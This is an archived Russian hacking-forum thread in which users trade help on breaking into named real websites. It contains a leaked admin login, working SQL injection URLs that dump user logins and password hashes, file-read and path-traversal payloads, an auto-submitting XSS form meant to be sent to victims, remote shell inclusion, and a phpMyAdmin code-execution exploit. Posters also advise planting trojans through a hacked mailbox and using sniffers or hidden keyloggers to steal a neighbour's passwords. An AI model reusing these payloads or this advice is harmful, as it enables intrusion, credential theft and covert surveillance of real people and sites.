Grema
ua-foto.com/admin/ - admin:stepanov

немогу залить шелл) попробуйте..

не могу догнать что можно сделать:
нашёл xss в поиске, "><script>alert(/xss/)</script> показывает мне сообщение. форма поиска методом POST работает.
я так понимаю это пассивная xss и мне нужно каким-то образом заставить админа кликнуть на Поиск с моими параметрами?
какие ещё могут быть варианты применения данной дыры?

посмотри , скорее всего в гете тоже есть полный вид запроса
Если нет, отлови ПОСТ запросы и попробуй через гет отправить

не могу догнать что можно сделать:
нашёл xss в поиске, "><script>alert(/xss/)</script> показывает мне сообщение. форма поиска методом POST работает.
я так понимаю это пассивная xss и мне нужно каким-то образом заставить админа кликнуть на Поиск с моими параметрами?
какие ещё могут быть варианты применения данной дыры?
Есть парочку показательных видео..что делать с пассивками как впаривать, и вообще как обращаться)
Гляньтут (http://video.antichat.ru)

<form name='wtf' method='post' action='http://site.ru/search.php'>
<input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
</form>
<script>wtf.submit();</script>
правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве

<form name='wtf' method='post' action='http://site.ru/search.php'>
<input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
</form>
<script>wtf.submit();</script>
правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве
Можно ли как то на JavaScript выдернуть сессию?
то есть не куки а сессию...?

Вот не могу понять, есть сайт http://www.wen.ru/ на нем есть форум. Шелл просто так не залить, для картинки просит урл. Можно ли сделать так. Залить картинку в которой будет либо шелл, либо редирект на урл с шеллом. И получится ли? А может есть какой то другой способ?

Rejjin, чтобы шелл-картинка сработал надо иметь инклюд под рукой. Или он просто не выполница как пхп-код и всё.

забыл как называется данный движок.
Вот скрин админки:

http://slil.ru/26131815/3c9e6e50.48c85f80/1.GIF
кто знает - отпишитесть

o3,14um
cutenews

[PHP]phpBB : Critical Error

Error creating new session

DEBUG MODE

SQL Error : 1114 The table 'phpbb_sessions' is full

INSERT INTO phpbb_sessions (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in, session_admin) VALUES ('d28f3eaae27fac24621bd1563ea4a3f9', 15103, 1221142494, 1221142494, '59bee7c5', 0, 1, 0)

Line : 205
File : sessions.php


Что я с этого могу поиметь?

Что я с этого могу поиметь?
Дуню Кулачкову

[PHP]phpBB : Critical Error

Error creating new session

DEBUG MODE

SQL Error : 1114 The table 'phpbb_sessions' is full

INSERT INTO phpbb_sessions (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in, session_admin) VALUES ('d28f3eaae27fac24621bd1563ea4a3f9', 15103, 1221142494, 1221142494, '59bee7c5', 0, 1, 0)

Line : 205
File : sessions.php


Что я с этого могу поиметь?

Ошибка создания новой сессии.
Режим отладки.
Ошибка скули: код 1114 - Таблица пхпбб_сессионс полная.

------ Тут запрос добавления данных в таблицу --------

Строка: 205
Фаил: сессионс.пхп


А терь думай,чо ты хошь там иметь :Д

http://www.pryanishnikov.ru/we.php?str=
тут есть инклуд? а то у мя невыходит замутить

http://www.pryanishnikov.ru/we.php?str=
тут есть инклуд? а то у мя невыходит замутить

Нету вроде.

http://www.pryanishnikov.ru/we.php?str=
тут есть инклуд? а то у мя невыходит замутить

есть, но нуль-байт экранизируется ковычками. Если бы мэджик квотс было бы офф - удалось бы реализовать

- логонимся на мейл.ру
- идем в Фото http://foto.mail.ru/
- берем картинку в формате JPEG, переименовываем в xss<hr>.jpg
- заливаем http://foto.mail.ru/cgi-bin/photo/addphoto
-- ставим галку Использовать имя файла как название фото
- идем в альбом, зрим загруженную картинку, тыкаем Показать фото другу, вписываем мыльик и отправлем
- идем в ящик, видим, что тег <hr> не вырезался ..

собственно вопрос - заюзать можно, или фильтрация (да, там фильтрация все-же есть) слишком сильная?

http://images.qwnet.ru/pictures/blacksun/thumbnails/mx_medium.jpg

возможно, проверь сам или стукни мне в аську - когда буду онлан;)

ХР - неопасный тег, возможно (скорее всего) он не фильтруется, а опасные фильтруются

Вот вопросик:
по запросу www.site.ru/id=1'
выдаёт
Notice: Undefined index: controller in /home/virtwww/w_new-la2life_fec2852b/http/cake/dispatcher.php on line 168 (В шапке)

Missing controller

You are seeing this error because controller Controller could not be found.

Notice: If you want to customize this error message, create app/views/errors/missing_controller.thtml

Fatal: Create the class below in file: app/controllers/controller.php

<?php
class Controller extends AppController {
var $name = '';
}
?>

(на странице)
можно с этим чё сделать?)

50\50
надо смотреть

На запрос videos.php?cat_id=28' Отвечает:
Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3

Что можно предпринять? :confused:

можно предпринять sql иньекцию ..

На запрос videos.php?cat_id=28' Отвечает:
Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3

Что можно предпринять? :confused:


videos.php?cat_id=28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
{4} вывод.
_http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,User(),0x7873716C696E6A656E64),0x71) ,0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
и там еще кусочек файла прочитать можно
_http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,LOAD_FILE(0x2F7661722F7777772F68746D 6C2F736974652F636F6E662F636F6E6669672E706870),0x78 73716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19/*

все благодаря SIPT :)
думаю я сайт угадал)

Parse error: syntax error, unexpected $end in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php(69) : regexp code on line 1 Fatal error: preg_replace(): Failed evaluating code: check_module('main', '
', 'format:\') in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php on line 69
ДАную ошибку как можно использовать?

никак

У меня такой вопрос: можно ли заливать шелл таким способом. http://site.ru/index.php?page=file://localhost/SDMMC/c99shell.php. Или что то этому помешает?

Rejjin, эээ...ты хоть напиши что в index.php на эту переменную о_О, а то можно написать и такое, что по этому запросу будет голая жопа во весь экран :) Вообщем, всё скрипта зависит.

Rejjin, =file:// - так нельзя. Можно через http и через ftp инклудить

Rejjin, =file:// - так нельзя. Можно через http и через ftp инклудить
и про php://input (сырые пост данные) не забудем

У меня такой вопрос: можно ли заливать шелл таким способом. http://site.ru/index.php?page=file://localhost/SDMMC/c99shell.php. Или что то этому помешает?Да боже мой. Каким боком ты собрался инклудить файл, расположенный у тебя на машине?? localhost - это твой локальный адрес, доступный только с твоего компьютера...
Мда (с)

Или что то этому помешает?Помешает отсутствие мозгов. Причём сильно.

Всем доброе время суток!вот в чём вопрос,мне нужно скрипт который запишет куки в отдельный файл жертвы которая перешла на эту страницу.Например:Я бросаю Вконтакте ссылку другу,говорю типа глянь какие тёлки, он переходит и его куки переходят ко мне.спс за помощь

без уязвимости xss, ты куки не сможешь сохранить на своём сервере. Только реферер (из относящихся к сайту), который ты и атк знаешь.

Если есть xss, то гугли на кейворд php сниффер

Сразу извиняюсь, если не туда пишу .
Есть доступ к майлу жертвы .Человек не знает , что его ящик взломан .Так же есть полный доступ к странице вконтакте .Можно ли как , то попасть на компьютер жертвы (залезть в него) .Залить троян на маил (отправить от лица жертве самому себе) или еще как то ?

отслеживай все входящие письма и если придет аттач с каким-либо исполняемым файлом прикрепи к нему троян раньше чем он прочитает это письмо

на одном сайте с помощью конструкции <script&#x3E;alert('xss')</script#x3E; в теле обьявы появляется <script>alert()</script> но алерт не вылезает. не судьба?))

в браузере видешь как надо, а в коде заменяется специальные символы и нечего не исполняется.
это такая функция в пхп : htmlspecialchars — Преобразует специальные символы в HTML сущности
Короче в этом месте хсс можешь не искать)

простите, возможно не в ту тему запостил..
нашол уязвимость форматирование строки..
где можно прочитать про єто, и как заюзать?

eLWAux Если ТЫ нашёл уязвимость, то это ТЫ должен описать метод её реализации и получить за это респекты, а не спрашивать. :)

простите, возможно не в ту тему запостил..
нашол уязвимость форматирование строки..
где можно прочитать про єто, и как заюзать?1.нашел ее не ты а xSpider (или что нить аналогичное)
2. гугл все отлично отвечает..

2Grema нда пнятна) а есть вероятность то хоть что это где нить упустили на этом же сайте?))

2Grema нда пнятна) а есть вероятность то хоть что это где нить упустили на этом же сайте?))
Думаю есть, я имел в виду что именно в том куске где ты пытался кинуть этот алерт хсс нету! а ты полазий по сайту может найдешь че-то интересное, хочешь, ссылку в лс посмотрим что там интересного.

Нашел локальный инклюд залил картинку с пхп кодом, но нуль байт не прокатывает чё делать?
Движёк самописный
Код скорее всево такой

if(file_exists($patch.'/'.$file.'.php')){
include($patch.'/'.$file.'.php');
}

а ты ничего и не сможешь делать, кроме как инклудить пхп файлы, который защищены, например ХТАККЕССОМ, и искать в них новые баги - но это ещё и от везения зависит;)

2Grema ога попозже) начала сам попробую))

эмм, попробуй поставить ?
index.php?file=путь/к/картинке.jpg?
хотя помойму это катит только прри удалённых инклудах

эмм, попробуй поставить ?
index.php?file=путь/к/картинке.jpg?
хотя помойму это катит только прри удалённых инклудах

Да это кактит только при удалённых инклудах.

Инлудить файл локально и передавать ему при этом параметр (через get или post) нельзя, поэтому конструкция типа ('include.php?a=1') работать не будет.

if(file_exists($patch.'/'.$file.'.php')){
include($patch.'/'.$file.'.php');
}

Если ты здесь можешь менять только переменную $file и %00 не прокатывает, то инклудить можно будет только файлы с расширением php.

А если можешь менять переменную $patch, то это уже удалённый инклуд.

Вопрос знатокам.
Есть бажный сайт.Скуля,файл прив включён.Возможность просматривать все дериктории, начиная с кореневого каталога.Записать шелл через скулю не получается =(. Заливка через админку тоже не проконала.Скуль менеджер не найден(.А теперь вопрос. Где в юниксе хранятся пароли от ssh ftp итд ,что бы как-то всё-же получить доступ к сайту?

/etc/passwd
or
GNU/Linux==/etc/shadow
or
freeBsd==/etc/master.passwd
2geforse в паблике только
http://www.securitylab.ru/poc/292387.php

Cmucl, некоторые фтп демоны хранят свои пароли в мускуле и тп субд
А от пароли юзеров, как уже сказал MaSTeR GэN, хранятся в /etc/shadow (Linux) и /etc/master.passwd (*BSD), вот только доступ к ним в 99% случаев имеет только рут

Продскажите плиз! PhpBB 3.0.1! Какие у него есть уязвимости?

Продскажите плиз! PhpBB 3.0.1! Какие у него есть уязвимости?
http://www.milw0rm.com/exploits/3370

Посмотрел! И почему не работает??

http://forum.tvingo.ru/includes/functions.php?phpbb_root_path=http://www.vkavkaz.tu2.ru/s1.php

Я же правельно всё зделала?

при запросе -1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/* выдает ошибку Query failed : Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION' как так?)) union же команда ее разве нада кодировать?)

j0ker13

-1+union+select+convert(concat_ws(0x3a,version(),us er(),database())+using+latin1)/*

вот так должно прокатить )

Посмотрел! И почему не работает??

http://forum.tvingo.ru/includes/functions.php?phpbb_root_path=http://www.vkavkaz.tu2.ru/s1.php

Я же правельно всё зделала?

значит пропатчен )

на дату бага посмотри 2007-02-24

http://www.vkavkaz.tu2.ru/
чеза говнофейк :D

Регистрация:
Внимание перед регистрацией вам надо авторезироваться:
В целях безопасности ваших данных, для успешного авторезирования на нашем сайте, вам нужно вести E-MAIL почтового ящика, и его пароль!

2~!DoK_tOR!~ неа)) convert может тока один столбик кодировать или можна сделать так -1+union+select+convert(1,2,3,4,5,6,7+using+latin1)/* или нада каждый конвертировать?))

j0ker13

линк дай

=) ушло тебе;))

j0ker13

-1+union+select+convert(concat_ws(0x3a,version(),us er(),database())+using+latin1)/*

вот так должно прокатить )
Я только не пойму, если ошибка:
(utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE)
Зачем конвертировать в latin1 ?

j0ker13

Вот так будет работать:
convert(concat_ws(0x3a,User(),Database(),Version() )+using+cp1251)

если вам нравится с конверт заморачиваться, а вообще

UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version ())))

универсально

jokester дык это понятна на счет Hex() а почему он ругается именно на Union?) кодировка же нужна тока при выводе колонки а не самой команде))

j0ker13
Учи английский :)
А если нужен практический пример то в соседнем топике лежит инъекция:
https://forum.antichat.ru/showpost.php?p=870637&postcount=6661

Попробуй её без конверта , и увидишь такую-же ошибку

2jokester ладна) по идее это правильно?) -1+union+select+convert(1,2,3,4,5,6,7,8,9,0,1,2+usi ng+cp1251) но выдает ошибку ; check the manual that corresponds to your MySQL server version for the right syntax to use near '2,3,4,5,6,7,8,9,0,1,2 using cp1251)/* ORDER BY date DESC LIMIT 0

Киньте линк, что-то гадание на кофейной гуще какое-то.

http://mp3db.ru/index.php?cid=9&subcid=-1+union+select+convert(1,2,3,4,5,6,7,8,9,0,1,2+usi ng+utf8)/*

http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,concat_ws(0x3a,Us er(),Database(),Version()),6,null,null,null,null,n ull,null/*

http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,count(*),6,null,n ull,null,null,null,null+from+users/*
14560 юзеров

юзеры
http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,concat_ws(0x3a,lo gin,passwd),6,null,null,null,null,null,null+from+u sers/*

Выводятся все так что юзай лимит :))

2jokester гг) спс) уже нашел эту базу)) еще вопрос) еси при лоад_файл не показывает ошибки и в принтабельном столбце пусто то однозначно нет файл_прив?)

Помогите с PostgreSQL столбцы подобрал (54)
http://support.kharkiv.ukrtelecom.ua/news/?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null--

народ, помогите плиз с этим: http://ashdoda.net/modules.php?name=Photo_Albums&file=show_photo&photo_id=%2724616
чо только не пытался, без результатов...

Если phpBB 3,0,1 Пропаченый где взять инфу про его баги и уязвимости?

geforce, скачать исходники форума, поставить патчи и попробовать разобрать сорцы. Или, как вариант, подождать новую версию и в логах посмотреть какие ошибки исправили, может что и всплывет.
Если не терпеться можешь порты просканить и узнать, что на них висит - вдруг бажное попадется или "соседний" сайт попытаться ломануть.
Дюша и Devoldini, это так будет
cmd -> cd с:\perl\bin\; perl.exe 1.pl
Хотя у меня когда Винда стояла, хватало команды perl 1.pl и всё запускалось (:

Так что с этим ничего нельзя сделать ? :(
http://support.kharkiv.ukrtelecom.ua/news/?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null--

почитай http://www.xakep.ru/magazine/xA/086/060/1.asp

почитай http://www.xakep.ru/magazine/xA/086/060/1.asp
Ничего полезного там нет :(

почему шелл при попытке открыть etc/passwd или прочитать другой каталог выше самого сайты выдает ошибку HTTP Ошибка 406 - Не приемлемо
safe_mode 0, open_basedir no value

Жертва находится на Masterhost.

1) нашёл инъекцию, пытаюсь прочитать файл, например так:
http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,LOA D_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31

Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу.


2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?

1)Попробуй перевести запрос в Char()
2)Не всегда

saynt2day
select file_priv from mysql.user where username='user'
где user - имя пользователя от которого работает мускуль
узнать через функцию user()

Уже запарился пользоваться поиском - нифига не выводит по теме.
Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?

Уже запарился пользоваться поиском - нифига не выводит по теме.
Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?


_https://forum.antichat.ru/thread45790.html

при -1+union+select+'1'+into+outfile+'/var/111'/* выдает ошибку Can't create/write to file ......(Errcode: 13) читать файлы можна) это значит права выставлены на папку и нада найти подходящую папку для аплоада или тут чет другое?)

(Errcode: 13) - нет прав на запись, ищи другую папку... ;)

Интересует такой вопрос:
Допустим что на сайте есть php уязвимость, для чего в ссылки вида
http://www.site.ru/index.php?file=
подставлять ../../../../../../../etc/passwd
Вот сделал такой запрос http://www.site.ru/index.php?file=../../../../../../../etc/passwd
и после такого запроса открывается файл passwd, какую информацию я могу получить из этого файла

из него можно узнать лоигны пользователей, пути к их домашним директориям и наличие у них действующего интерпретатора.

http://ru.wikipedia.org/wiki//etc/passwd

Ну вот например
http://www.marine-marketing.gr/newsclip.php?file=../../../../../../../../../../../etc/passwd
http://www.movitel.co.cu/descarga.php?file=../../../../../../../../etc/passwd
Вот что от сюда можно извлеч?
Прост много почитал статей про php инъекции, но не всё усвоил

Жертва находится на Masterhost.

1) нашёл инъекцию, пытаюсь прочитать файл, например так:
http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,LOA D_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31

Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу.


2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?


1)Попробуй перевести запрос в Char()
2)Не всегда

1) в char мне кажется смысла переводить нет, т.к кавычки не фильтруются и запрос срабатывает.
2) тут мне было интересно, может быть кто уже знает наверняка, есть у пользователя MySQL хостинга masterhost по умолчанию права на доступ к файлам.

saynt2day
select file_priv from mysql.user where username='user'
где user - имя пользователя от которого работает мускуль
узнать через функцию user()

к сожалению прав доступа к БД mysql у пользователя user() нет.

saynt2day, попробуй load_file('/etc/passwd') или зарегай там акк и посмотри какой полный путь будет у тебя и по аналогии подбери путь до жертвы.

На примере другого мастерхостовского сайта выяснил, как выглядят у них пути:

http://www.mobil-life.ru/phones/catalog/?cat=1&madeby=2%27

/home/u20726/mobil-life.ru/www/index.php

Но штука в том, что у нужного мне сайта несколько доменных имён, которые все ведут на один сайт.

Пытаюсь прописывать все эти домены в SITE_NAME:
/home/ACCOUNT/SITE_NAME/www/

и ничего...

Помогите раскрутить баг:
http://www.mymovie.in.ua/film_info.php?film_id=323
http://www.mymovie.in.ua/film_info.php?film_id=324-1
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/UNION/**/SELECT/**/1,2,3/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/4/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/3/*
Не получается подобрать число полей, по GROUP BY получается что должно быть 3 поля, но нет.

http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+version()/*

Благодарю, krypt3r за помощь

Нашел таблицу юзеров:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+concat(name,0x3a,email,0x3a,pass)+f rom+user/*
Жаль, алгоритм хеширования не из числа популярных

MySQL_64bit

diehard, хэши - это хорошо =) Там, кстати, можно и без пароля зайти))
ЗЫ. Алгоритм хэширования - MySQL4 aka OLD_PASSWORD в пятом мускуле

Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat

Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?

Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat

Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?


Можно делать листинг путем команд в переменной

пример http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/../

Во спасибо большое!
Но вообще я так понял ничё серьёзного???

Во спасибо большое!
Но вообще я так понял ничё серьёзного???

в принципе да.

держи еще xss пассив =)

http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=%3Cscript%3Ealert(%22111%22)%3C/script%3E

http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?

А почему у тебя id=0?? попробуй -1 или 99999.

если даже так разницы нет)

А да и еще на сайте есть XSS
http://сайт/id=[XSS]/*

Ссылку хоть дай

А оставить ковычку пробывал?

Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Да уже все перепробовал...
Мне интересно почему висит вот эта ошибка постоянно независимо от того что вбивать в http://сайт/id=/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Попробуй использовать такой комент "--" вместо "/*"

Попробуй использовать такой комент "--" вместо "/*"
тоже уже пробовал

а ещё вот такой +--+

и проверь на раскрытые скобки в запросе. Попробуй проанализировать, что там фильтруется

Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*
но так нехочет:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*

http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?


Попробуй вместо пробелов /**/

id=0/**/union/**/select/**/1/*

у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...

у меня была такая же трабла с запросом. Когда подставляешь ` (обратную кавычку) то результат меняется...
Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.

[akep']Помогите SQL-inj
Вот кол-во столбцов вроде подобрал
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+order+by+21/*
но так нехочет:
http://moy-gorod.com.ua/cat.phtml?curcat=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*
Скорее всего одна переменная идёт в два разных запроса с разной структурой, т.е. разное количество столбцов


Сообщение от IND1G0
http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?Попробуй вместо пробелов /**/

id=0/**/union/**/select/**/1/*
Бред. Значение из переменной подставляется в limit, а т.к. в лимит нельзя вставлять выражения, то ты в пролёте.

Без разницы какую кавычку ставить ... Важно изменить так чтобы страница имела отрицательное значение.
Надо чтобы значение не существовало

Надо чтобы значение не существовало
я ето имел в виду.

помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются

Как узнать пасс на инет у соседа? у нас с ним сетка!!!

Как узнать пасс на инет у соседа? у нас с ним сетка!!!
По конкретней сударь!

Бред. Значение из переменной подставляется в limit,

1значение переменной вообще может не фигурировать в запросе, что общего между:
страница id=0 union select 1/*
и
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

2 и это не обязательно лимит, например where lala=1,-20,10


:add sql inj здесь не прокатит

Так,активировал телнет серв на компе.При коннекти по 3389-ому порту выдаёт следующее:

Вход в систему невозможен из-за ограничений учётной записи

Каких ограничений ? =_=.Проверку делал,когда чел был в логоффе и в онлайне.Фаир и антивирь отключен,ибо это точно не из-за них.

У меня с моим соседом стоит сетка через хаб, и у него безлимитка, хочу узнать его логи и пасс на инет

http://сайт/id=0+union+select+1/*

Выводит

(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16

Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Всеи спасибо, разобрался...

Gema
http://ktools.net/news_detail.php?nid=-1+union+select+1,version(),3,4,5/*
ktools.net/forum - есть форум но видемо база другая..

777DEMYAN777
приди к нему домой... мол фильмы посмотреть, пока он ушел делать чай.. закинь password recovery.. или того же самого пинча подкинь...

DJ ][akep
http://moy-gorod.com.ua/news.phtml?view=-37'+union+select+1,2,3,4,5,6,7,8,9,table_name+from +information_schema.tables/*
логический вывод 4 версия... можешь не продолжать )

помогите заюзать http://ktools.net/news_detail.php?nid=' нужно вытащить двиги которые продаются

У кого-нибудь есть соображения?

У кого-нибудь есть соображения?
http://ktools.net/news_detail.php?nid=1+union+select+1,2,concat_ws(0 x40,user(),database(),version()),4,5--
Бруть таблицы ..SIPT'ом например

У меня с моим соседом стоит сетка через хаб, и у него безлимитка, хочу узнать его логи и пасс на инет
используй локальный снифер.

используй локальный снифер.
Дай пожалуйста ссылку на его

Шпионская программа для платформы Windows, предназначенная для перехвата паролей в локальной сети. Программа умеет прослушивать Сеть и позволяет захватывать пароли любого сетевого пользователя через FTP, POP3, HTTP, SMTP, Telnet протоколы. Ace Password Sniffer при работе не создаёт никакого трафика в сети, поэтому Вы не будете обнаружены другими пользователями сети..

Скачать тут (http://hackersoft.ru/mirror.html?id=ace_password_sniffer_1_4&mirror=1) .

Пробуй...

с этого обменника нельзя почему то скачать, другую ссылочку пожалуйста дай

Держи (http://hackersoft.ru/mirror.html?id=ace_password_sniffer_1_4&mirror=2)...

Спасибо, скачал, только что надо делать чтобы получить пассы?

запусти прогу и попроси своего друга зайти в инет и скачать что нить..

Мужики, нарыл на одном сайте скрипт filemanager.php , дает залить на сервак файл (шелл), но хоть убей не могу найти куда он его льет. Примерная структура сайта есть..
Не хочу светить сайт - с помощью прошу в л/с

Доброе время суток,кто подскажет,что за шифрование?
*a1909ea3a9dbd4bb8713d01188e5da99f971817f
и если можно,то и пасс нехэшированный

Это mysql или SHA1 хеш. Отличить их нельзя так как одинаковы по формату, но обычно эта звёздочка впереди обозначает что это все же мускульный хеш (MySQL_160bit)

Помогите!!! Имею полный доступ к компу, как вытянуть пароли на инет с него, если юзер их не сохраняет

Помогите!!! Имею полный доступ к компу, как вытянуть пароли на инет с него, если юзер их не сохраняет
кейлогер

какой посоветуете? и чтобы юзер не заметил, пожалуйста ссылку дайте

какой посоветуете? и чтобы юзер не заметил, пожалуйста ссылку дайте
Посоветуйте пожалуйста

кто может сказать где в установленой друпал хранится пароль от базы?)) чет найти не могу(

Посоветуйте пожалуйста
Напиши сам под драйвера клавиатуры жертвы! Самый надежный способ + не спалишься!

Подделал PHPSESSID на сайте плагином от фаирфокса.И не сработало ниче =_=.В таблице xoops_session есть также sess_ip,sess_data,sess_id(его я и подделал),но в куках передаётся _utmb _utmc _utma _utmz hotlog и b,помимо PHPSESSID.Сайт в виде site.ru,ибо форумные куки отличаются.Что делать дальше не знаю,так как пробывал и другие идентификаторы сессии менять.А расшифровать ид сессии,насколько я знаю,не представляется возможным.

Хм... скорее всего ид привязонно к ип !и подделов ид не получишь доступа! Есче вопросик а зачем ты заморачиваешься если у тебя есть доступ к базе ?

Вопрос такой:
Последняя бага в phpMyAdmin (_http://www.securitylab.ru/vulnerability/359583.php):
1) Исходник бажного кода:

$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
usort($databases, create_function('$a, $b', $sort_function));


Сам сплоит:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec ('cp $(pwd)"/config.inc.php" config.txt');//&sort_order=desc&token=825fdd1c5f1c43a450de3af6f6d34b22


Бага в принципе понятна - отсуствие фильтрации при использовании переменных в создаваемой функции.
Тем не менне, эта бага нигде не работает. У меня.
Да и еще exec - я понимаю, php, но при чём тут тогда оператор OR?

P.S. magic_quotes=Off
token валидный

<?
$sort_by='"]) || exec(\'cp $(pwd)"/config.inc.php" config.txt\'); //';
$sort_order='desc';

$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
echo $sort_function;

create_function('$a, $b', $sort_function)
?>


мы просто тактично делаем пхп инжект

вот что мы получим в $sort_function

return -1 * ($a[""]) || exec('cp $(pwd)"/config.inc.php" config.txt'); //"], $b[""]) || exec('cp $(pwd)"/config.inc.php" config.txt'); //"]);

я изменил or на ||
это просто логическое условие, что заставляет выполнятся наш код...

Так, то что || и OR эквивалентны буду знать. Под рутом, с правами на запись и при exec разрешенном все-равно не работает(

UPDATE.


Приведенный мной код сорцов - это 2.11.4, автор уязвимости утверждает, что
The problem also occurs in phpMyAdmin-2.x but it is not as easy to exploit as in 3.0
I will publish more informations some days after the patch is released
